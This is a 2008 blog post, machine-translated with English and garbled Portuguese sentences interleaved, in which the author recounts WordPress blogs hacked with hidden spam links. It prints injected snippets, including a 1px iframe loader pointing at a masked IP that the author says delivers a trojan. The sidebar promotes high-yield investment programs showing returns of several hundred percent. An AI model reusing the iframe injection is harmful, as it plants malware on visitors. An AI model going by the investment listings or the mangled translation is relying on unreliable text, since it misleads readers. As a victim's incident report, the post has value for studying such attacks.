My Wordpress Hacked with Hidden Spam Injection Meu Wordpress cortou com injeção escondido spam

Hits for this post:2051 | Popularity: 20% Hits para esta postagem: 2051 | Popularidade: 20%
Written by Escrito por pramudita.anindita.ptd — published on May 12th, 2008 | -- Publicado em 12 de maio, 2008 |

Three of my Wordpress blog hacked, that blogs installed on 2 different servers. Três do meu blog Wordpress cortado, que instalou em 2 blogs diferentes servidores. I was hit by the spam injection. Eu fui atingido pelo spam injecção. Spammer(s) injected long hidden links (hundreds of lines!) in blog posts and footer of my Spammer (s) injetado longo links ocultos (centenas de linhas!) No blog e no rodapé das minhas HYIP blog for revenue sharing HYIP blog para a repartição das receitas site. Spammer(s) are also inserting iframes in blog posts of my other multi register users blog. Spammer (s) são também inserir iframes no meu blog posts de outros usuários multi registo blog. That spammer(s) hacked this blog too with inject(s) hidden link of common spam words into footer only ( people can't register at this blog). Esse spammer (s) cortou também a injectar este blog (s) de ligação escondida spam comum em rodapé apenas palavras (as pessoas não podem registrar a este blog).

Blogs are most likely attacked by some kind of automated tool since the amounts of spam are too big to work manually on all those spam pages creation. Os blogs são mais prováveis atacada por algum tipo de ferramenta automatizada desde a quantidade de spam são demasiado grandes para o trabalho manual em todas as páginas spam criação.

Hidden Text Injection : The insertion was done deliberately to hide the text from display as follows (Injected into blog posts from one of my multi users blog): Injeção texto oculto: A inserção foi feito deliberadamente para ocultar o texto do seguinte modo de exibição (injectado no blog de um dos meus múltiplos usuários blog):

PLAIN TEXT Texto simples
CODE: CÓDIGO:
  1. <font style= "overflow: hidden; position: absolute; height: 0pt; width: 0pt" > <font style= "overflow: hidden; position: absolute; height: 0pt; width: 0pt">
  2. Spam words with link to spam websites Spam palavras com link para sites spam
  3. </font> </ font>

Iframe Injection : my other multi register users blog injected with a 1px iframe due to a vulnerability in WordPress ... Iframe Injecção: multi registrar meus outros usuários blog injectado com uma 1px iframe devido a uma vulnerabilidade no WordPress ... looks like this : olha como este:

PLAIN TEXT Texto simples
CODE: CÓDIGO:
  1. <!-- Traffic Statistics --> <iframe width= "1" height= "1" frameborder= "0" src= "http://xx.xxx.xx.xx/iframe/wp-stats.php" > </iframe><!-- End Traffic Statistics --> <! - Estatísticas de Tráfego -> <iframe width= "1" height= "1" frameborder= "0" src= "http://xx.xxx.xx.xx/iframe/wp-stats.php"> </ iframe ><!-- Fim de tráfego Estatísticas ->

and of course it downloads a trojan. e é claro que carrega um trojan. Its happening to a TON of blogs too. Sua acontecer a uma tonelada de blogs também.

Template Injection : Not only did the hackers insert “invisible” code into my blog posts, what had happened was my template had been hacked so that the footer had included a ton of hidden spam terms. Modelo de injecção: Não só a inserir hackers "invisível" código no meu blog posts, o que tinha acontecido era meu modelo tinha sido cortado de modo a que o rodapé tivesse incluído uma tonelada de spam termos escondido.
Number of paragraphs: 1 Número de pontos: 1
Number of words: 115,520 Número de palavras: 115.520
Number of letters and digits: 468,439 Número de letras e algarismos: 468.439
Number of characters: 595,969 Número de caracteres: 595.969
File size: 628,009 bytes Tamanho do arquivo: 628.009 bytes

Look like this : Aparência:

PLAIN TEXT Texto simples
CODE: CÓDIGO:
  1. <!-- ~ --><u style= "display: none" > <a href= "http://spammerdomain.ext/spampage.html" >ton of spam terms </a> </u><!-- ~ --> <! - ~ -> <u Style= "display: none"> <a href= "http://spammerdomain.ext/spampage.html"> tonelada de spam termos </ a> </ u> <! -- ~ ->

from lower credit card to porn credit card, from buy cheap car insurance to unreal auto car insurance :p de menor cartão de crédito para porn cartão de crédito, seguro de carro barato comprar a irreal auto seguros automóveis: p

Now, I'm trying to get more information and solve this problem and trying to find the answers for these questions : Agora, estou a tentar obter mais informações e resolver este problema e tentar encontrar as respostas para estas perguntas:

Why would someone want to hack my website? Porque alguém deseja cortar o meu site?
What should I do to detect and eventually block hacking attempts? O que devo fazer para detectar e, eventualmente, bloquear tentativas hacking?
What kinds of hackery going on? Que tipos de hackery acontecendo?
How to Prevent SQL Injection Attacks? Como prevenir ataques SQL Injection?
How To Repair The Damage? Como a reparar os danos?
Search Engine Effects of This Situation Search Engine efeitos desta situação
Etc.
I'll be back soon ! Volto em breve!

Update : Update:

Google temporarily removed some of my webpages from their search results. Google temporariamente removido algumas das minhas páginas de seus resultados de pesquisa. Currently pages from Atualmente a partir de páginas blog.pramudita.com are scheduled to be removed for at least 30 days. Está programada para ser removido por pelo menos 30 dias. This blog hacked too. Este blog cortou também. Spam terms inserted into footer.php of current theme and user : "wordpress" registered into that blog, also he changed these files : Spam footer.php inserido em termos de tema atual e de usuário: "wordpress" registrado em seu blog, ele também mudou esses arquivos:

  1. index.php
  2. xmlrpc.php
  3. wp-trackback.php and WP-e trackback.php
  4. wp-settings.php WP-settings.php
Top incoming search terms for this post Top incoming pesquisas para esta postagem
    Latest Post From Each Category Última mensagem de cada categoria

    This entry was posted on Monday, May 12th, 2008 at 5:08 pm and is filed under Esta entrada foi postada na segunda-feira, 12 de maio, 2008, 5:08 pm e é apresentado ao abrigo WordPress . You can follow any responses to this entry through the Você pode seguir eventuais respostas a esta entrada através da RSS 2.0 RSS 2,0 feed. alimentar. You can Você pode leave a response deixar uma resposta , or , Ou trackback from your own site. a partir do seu próprio site. .

    No Responses to “My Wordpress Hacked with Hidden Spam Injection” Não Responses para "My Wordpress Hacked com Hidden Spam Injeção"


    Top 5 Commenters at Our Blog Top 5 Commenters em nosso blog
    1. huizyu: 23 huizyu: 23
    2. reussytiemyl: 2 reussytiemyl: 2
    3. 婚紗攝影: 2婚纱摄影: 2
    4. opheus: 1 opheus: 1
    5. DD: 1 DD: 1

    You can subscribe to the Você pode se inscrever para o RSS feed for comments on this post. RSS feed para comentários sobre este post. You can also reply to this post directly in your weblog, Você também pode responder a esta mensagem diretamente no seu weblog, and take advantage of the TrackBack URI e tirar partido das TrackBack URI to record your reply in this post. para gravar a sua resposta a este posto.

    1. No comments posted yet Ainda não há comentários postados

    Leave a comment Deixe um comentário

    Line and paragraph breaks automatic, e-mail address never displayed, HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong> Linha n º pausas e automático, endereço de e-mail nunca exibido, HTML permitidos: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <recuo citar = "" > <code> <em> <i> <strike> <strong>


    Verificação Image

    Please type the letters you see in the picture. Por favor, digite as letras que aparecem na imagem.

    - --

    Money & Investment Dinheiro & Investment

    • Current TOP HYIPs - May 2008 Atual TOP HYIPs - maio 2008
      Here are current top performance HYIP, goldpoll version : 1) Large Sum lifetime: 866 days monitoring: 474 days admin rate: 4 user rate: 253.5 funds return: 417.40% 2) Golden Path Invest lifetime: 435 days monitoring: 403 days admin rate: 4 user rate: 94.7 funds return: 286.00% 3) 4 FX Trader lifetime: 701 days monitoring: 148 days admin rate: 3 user rate: 114.6 funds return: 225.00% 4) Alco Holding […] Aqui estão actual desempenho superior HYIP, goldpoll versão: 1) Grande Soma vida: 866 dias acompanhamento: 474 dias admin taxa: 4 taxa usuário: 253,5 retorno fundos: 417,40% 2) Golden Path Invest vida: 435 dias acompanhamento: 403 dias admin taxa : 4 taxa usuário: 94,7 retorno fundos: 286,00% 3) 4 FX Trader vida: 701 dias acompanhamento: 148 dias admin taxa: 3 taxa usuário: 114,6 retorno fundos: 225,00% 4) Alco Holding […]
    • Earn 1$ with 15 min per day-that cool! Ganhe $ 1 em 15 minutos por dia-que cool!
      “This is to show you how simple it is to earn money using internet spending only 15 minutes per day“. "Isto é para mostrar como é simples de ganhar dinheiro usando internet gastar apenas 15 minutos por dia". Just see the sites listed below and the minimum payout(You can request payment once your earnings reach this value!) Please note that there are many such websites and I am giving the best of them so that […] Basta ver os sites listados abaixo e ao pagamento mínimo (Você pode solicitar pagamento depois que seu salário atingir esse valor!) Por favor note que existem muitos desses sites, e estou dando o melhor de modo a que eles […]
    • SAInvestment Scam Fraud Alert SAInvestment truque fraude alerta
      I read SAInvestment Investigation at HYIP - Expert’s Blog. Eu li SAInvestment Investigation em HYIP - Expert's Blog. I agree that SAInvestment address is often utilized by scammers. Concordo que SAInvestment endereço é frequentemente utilizado por golpistas. I found that address used by these programs too. Achei que o endereço usado por esses programas também. Here they are : PWW4YOU Domain Name: PWW4YOU.COM Registrant: Virtus Offshore Investment Co. Virtus Offshore Investment Co. ********@voichaven.com) Suite 2007 20th Floor The Century Tower Ave Ricardo J. Alfaro Panama City Panama,- PA Tel. São eles: PWW4YOU Domain Name: PWW4YOU.COM registando: virtus offshore investimento Co. virtus offshore investimento Co. ********voichaven.com) Suite 2007 20o andar do século Torre Ave Ricardo J. Alfaro Panamá City Panamá, - PA Tel. 603.91541210 Creation Date: 26-Oct-2006 Expiration Date: […] 603.91541210 Criação Data: 26-Oct-2006 Data de validade: […]
    • Latest News of FFG Trading Últimas Notícias de negociação FFG
      Here are latest news from FFG Trading. Aqui estão últimas notícias de FFG Trading. FFG Trading Online since February 23, 2008 Mar 04, 2008, 12:08 FFG Trading Under DDoS Attack, they website experienced continuous DDoS attacks Mar 26, 2008 Problem with DNS servers, website inaccessible. FFG Trading on-line desde 23 de fevereiro de 2008 Mar 04, 2008, 12:08 FFG Trading Sob DDoS Attack, eles site experiente contínua ataques DDoS Mar 26, 2008 Problema com servidores DNS, website inacessível. ffg-trading.com has been suspended by the domain registration authority due to a number of complaints that their domain name involved […] ffg-trading.com tenha sido suspensa pela autoridade registro de domínio, devido a uma série de queixas que o seu nome do domínio envolvido […]
    • Invesco Trade - Latest News Invesco comércio - Últimas Notícias
      Investors asking latest news about Invesco Trade who made a claim “have been working several years in research department of big brokerage company”. Os investidores pedem últimas notícias sobre Comércio Invesco feita uma alegação que "têm vindo a trabalhar há vários anos no departamento de investigação de grande corretora empresa". This question emerged when they were not accept payment from Invesco Trade. Esta questão surgiu quando eles não eram aceita pagamento de Invesco Comércio. So what is was on with Invesco Trade ? Qual é, então, foi sobre a Invesco Comércio? The answer is : Invesco Trade scam and gone. A resposta é: Invesco Comércio scam e desapareçam. They were lier, what […] Eles foram Lier, aquilo […]

    Black Listed & Scam Program Black & truque programa listado

    • MInvestment
      MInvestment scam and gone. MInvestment scam e desapareçam. This HYIP is one of most current popular HYIP, working since 2000 (claimed). HYIP Esta é uma das mais populares atuais HYIP, trabalhando desde 2000 (alegado). A few investment plans with daily payouts from 1,4% to 2,3% percent and VIP offers. Alguns planos de investimento com pagamentos diários a partir de 1,4% para 2,3% por cento e VIP oferece. They have professional phone, live chat and email support. Eles têm profissional telefone, e-mail e chat apoio. Multilingual site and operating your funds professionally with guaranteed income. Multilingual site e seus fundos operam profissionalmente com rendimento garantido. Also MInvestment Scam Is […] Será também MInvestment Golpes […]
    • Open Trade Open Trade
      Open Trade International, Inc.  They claimed as company which investsed money in Forex market, their program website Investment Plan : Promotional * $20 - 50 1.00% […] Open Trade International, Inc. Eles alegaram que as empresas investsed dinheiro em Forex mercado, o seu programa site Plano de Investimento: Promocional * $ 20 - 50 1,00% […]
    • MICROSOFT-SOFTWARE LOTTERY MICROSOFT-software loteria
      Beware ! Cuidado! Stay away from fraud email like this : CONGRATULATIONS! Fique longe de fraude e-mail como este: Parabéns! YOUR EMAIL ACCOUNT / ADDRESS HAS WON. Seu e-mail conta / endereço já ganhou. FROM: PROMOTIONS DEPARTMENT OF MICRONET SOFTWARE LOTTERY INTER., WINNING NOTICE FOR CATEGORY “A” WINNER. A partir de: departamento de promoções MICRONET software inter loteria., Vencedora aviso para a categoria "A" vencedor. REF. NO: LSLUK/2031/8161/07. NÃO: LSLUK/2031/8161/07. BATCH NUMBER: 14/011/IPD. NÚMERO DO LOTE: 14/011/IPD. Attention: Dear Winner , MICROSOFT-SOFTWARE LOTTERY International has just concluded its final draws of it’s periodical promotional program on November 26th, 2007 by […] Atenção: Caro Vencedor, SOFTWARE MICROSOFT-LOTERIA Internacional acaba de terminar o seu final de empates é periódica promocional programa em 26 de novembro de 2007 até […]
    • Aliativa
      Aliativa is not paid since 31/10/2007. Aliativa não é pago desde 31/10/2007. I send few letters to support but not have answer this program SCAM ! Me enviar algumas cartas de apoio à resposta, mas não tem este programa truque! Program Description Aliativa is a leading global investment manager that provide financial expertise both to the companies, and private investors worldwide. Descrição Programa Aliativa é um líder mundial gestor de investimento que fornecem financeiras especializadas, tanto para as empresas, e os investidores privados em todo o mundo. Bla..bla…blah. ..… Blá blá blá. Aliativa Investment Plan Light : 1.0% Daily, 10$-3000$ for 240 days Standard : 1.4% Daily 3000$-10000$ for […] Plano de Investimento Aliativa Light: 1,0% Diariamente, 10 $ -3000 $ 240 por dia Standard: 1,4% Diário de $ 3000 $ -10000 […]
    • Swisscash
      Latest news from Swisscash : stay away from Swisscash (Swisscash.biz, swisscash.net, swissmutualfund.biz) and fake swisscash websites like swisscashguide, francswiss etc. Swisscash was most popular HYIP which have great website design, unique script, good plan and have more investors (scammed). Últimas notícias da Swisscash: permanecer longe do Swisscash (Swisscash.biz, swisscash.net, swissmutualfund.biz) e falso swisscash sites, como swisscashguide, francswiss etc Swisscash era mais popular HYIP que têm grande site design, único script, e têm bom plano mais investidores (scammed). Swisscash Website: www.swisscash.biz www.swisscash.net www.swissmutualfund.biz www.sip25.com Swisscash Website Preview Swisscash Domain Information HYIP, HYIP Scam, Michael Mansfield, Ponzi, S, Scam List, Swisscash, swisscashguide, Swissmutualfund Swisscash Website: www.swisscash.biz www.swisscash.net www.swissmutualfund.biz www.sip25.com Swisscash Website Preview Swisscash Domain Information HYIP, HYIP Golpes, Michael Mansfield, Ponzi, S, Golpes Lista, Swisscash, swisscashguide, Swissmutualfund

    Blog & WordPress Blog & WordPress

    • Installing Multiple Blogs for Multiple Users Instalando vários blogs para vários usuários
      I have been planning to install multiple blog for multiple bloggers on my network. Tenho vindo a planear instalar várias blog para vários blogueiros na minha rede. Now I confuse which project shall I choose. Agora que me confundem projeto é que eu escolher. There are lot of wordpress projects. Não há grande quantidade de projetos wordpress. Alternative projects and plugins which provide some level of multi-blogging facility are : Lyceum Developed by ibiblio.org, Lyceum is a stand-alone multi-user multi-blogging application designed to handle 2 to […] Alternativa projectos e plugins que prestam algum nível de blogs multi-instalação são os seguintes: Liceu Desenvolvido por ibiblio.org, Liceu é um stand-alone multi-user multi-blogging aplicação concebido para servir a 2 […]
    • Error When Saving Posts - on Line 294 Erro ao salvar Cargos - em Linha 294
      Access denied for user ‘username’@’localhost’ (using password: NO) on line: 294. Acesso negado para o usuário 'username' @ 'localhost' (usando password: NO) on-line: 294. I get that error every time I save a post on new post or edit post. Eu recebo este erro cada vez que eu salvar um post no novo cargo ou editar post. I confused with this error and didn’t know how to solve this. Eu confundido com este erro e não sabia como resolver esta questão. So I asked to Google and found this thread : Error When Saving Posts That thread solved […] Então eu perguntei ao Google e encontrei esse tópico: Erro ao salvar lugares que resolveu thread […]
    • Looking for Best RSS Aggregator or Feed Syndication Plugin Olhando para a melhor agregador ou feed RSS syndication plugin
      I’m looking for best plugin for my network blog (Pramudita’s Network). Estou à procura de melhores plugin para a rede o meu blog (Pramudita's Network). I need a RSS aggregator/Feed Syndication which can generate content from my other feeds. Eu preciso de um agregador RSS / Feed Syndication o que pode gerar conteúdo de meus outros feeds. Yes, auto content generator which take content from all of my blog feeds. Sim, auto gerador que tenham conteúdo de todos os conteúdos do meu blog feeds. Let’s try to find that plugin. Vamos tentar encontrar o plugin. First I try to find this plugin at : WordPress Plugin Database. Em primeiro lugar eu tentar encontrar esse plugin em: WordPress Plugin Database. Found […] Encontrado […]
    • Best Social Bookmarking Sites Melhor locais bookmarking sociais
      Social Bookmarking is very important in promoting our businesses, our web sites and our blogs. Bookmarking sociais é muito importante na promoção de nossas empresas, o nosso web site e os nossos blogs. Marketers can use social bookmarks to allow visitors to share their content. Marqueteiros pode usar bookmarks sociais para permitir que os visitantes a partilhar os seus conteúdos. Here are list of best social bookmarking sites, updated June 2007 Page Rank 9: http://www.netscape.com/ | Alexa: 504 Page Rank 8: http://digg.com/ | Alexa: 80 http://del.icio.us/ | Alexa: 159 http://www.fark.com/ | Alexa: […] Aqui estão lista dos melhores locais bookmarking sociais, atualizado junho de 2007 Page Rank 9: http://www.netscape.com/ | Alexa: 504 Page Rank 8: http://digg.com/ | Alexa: 80 http:// del.icio.us / | Alexa: 159 http://www.fark.com/ | Alexa: […]
    • WordPress 2.1.1 Was Highly Exploitable Code WordPress 2.1.1 foi altamente explorável Código
      If you downloaded WordPress 2.1.1 within the past 3-4 days, your files may include a security exploit that was added by a cracker. Se você baixou WordPress 2.1.1 nos últimos 3-4 dias, seus arquivos podem incluir um sistema de segurança que foi adicionado ao explorar um cracker. Read more here Leia mais aqui

    Energy and Fuel Energia e Combustíveis

    • Home Made Solar Water Heater Home feitas aquecedor solar de água
      I read related information of water fuel for car, now I interest with makings process of a solar water distiller and solar water heater. Eu li as informações relacionadas de água combustível para automóveis, agora eu juro em resultado de um processo destilador solar de água e aquecedor solar de água. Both concerning hand in glove with heat (the sun), then as my first phase I will look for making solar water heater, yes homemade solar water heater or Do It Your self […] Ambas as relativas luva na mão com calor (o sol) e, em seguida, como a minha primeira fase vou procurar fazer aquecedor solar de água, sim caseiro aquecedor solar de água ou Faça Sua auto […]
    • Hello Energizer Olá Energizer
      Expensive petroleum price and growing climate earth’s heat, growing amount of sunlight reaching the Earth has triggered human creativity in finding and optimize utilization nature energy as the source of energy. Petróleo caro preço e crescente clima da Terra calor, crescente quantidade de luz solar atingindo a Terra tem desencadeado criatividade humana e na busca otimizar a utilização natureza energia como fonte de energia. This blog makes as place to collect related information about energy (solar energy, wind energy, water energy, renewable energy, fossil fuels and many other things) […] Este blog faz como local para coletar informações relacionadas sobre energia (energia solar, eólica, energia, água energia, energias renováveis, combustíveis fósseis e de muitas outras coisas) […]

    My Sister’s Celebrities Gossip Minha irmã da Gente gossip

    • Lindsay Lohan in Troubles Lindsay Lohan em problemas
      Lindsay Lohan is another celebrity that got into troubles. Lindsay Lohan é outra celebridade que começou a ter problemas. Lindsay Lohan has been accused of stealing a £5,000 fur coat from Marsha Markova partying at the same club. Lindsay Lohan tem sido acusado de roubar um casaco de peles de 5000 libras esterlinas Marsha Markova festejando ao mesmo clube. Marsha Markova, an artist and socialite, was wearing the shockingly expensive dead animal pelts to a friend’s birthday party — a party that was also attended by Lohan. Marsha Markova, um artista e socialite, foi chocante vestindo a cara peles dos animais mortos para um amigo o aniversário do partido - um partido que também foi assistido por LOHAN. […]
    • Heidi Montag in Maxim February 2008 Heidi Montag Maxim em fevereiro 2008
      MTV’s ‘The Hills’ Heidi Montag is featured in the latest issue of Maxim. MTV's "A Hills" Heidi Montag é destaque na última edição da Maxim. Heidi Montag just a small-town girl from Colorado making it big on the blogs and getting the Maxim cover she’s dreamed of ever since the boys in high school called her a surfboard. Heidi Montag apenas uma pequena vila menina de Colorado tornando-se grande sobre os blogs e recebendo a cobertura Maxim's ela sonhava em vez desde os rapazes no ensino médio chamado ela uma prancha de Surf. It must be so awesome to be her! Deve ser tão maravilhoso para ser ela! This Maxim […] Este Maxim […]
    • Heidi Montag and Spencer’s Candid Photos Heidi Montag e Spencer's Candid fotos
      The latest Hollywood couple to hit the South-of-the-border beaches is none ot